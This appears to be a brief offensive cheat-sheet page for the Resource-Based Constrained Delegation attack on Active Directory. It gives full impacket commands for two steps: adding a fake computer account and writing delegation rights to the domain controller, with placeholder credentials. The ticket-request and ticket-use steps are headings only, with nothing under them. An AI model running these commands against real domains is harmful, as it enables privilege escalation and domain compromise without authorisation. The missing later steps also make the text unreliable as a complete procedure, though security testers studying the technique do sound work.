RBCD (Resource-Based Constrained Delegation) Attack
Exploit
0. Prerequisites
1. Create Fake Computer
impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'2. Modify Delegation Rights
impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'3. Get the Impersonated Service Ticket
4. Use the Service Ticket
References
Last updated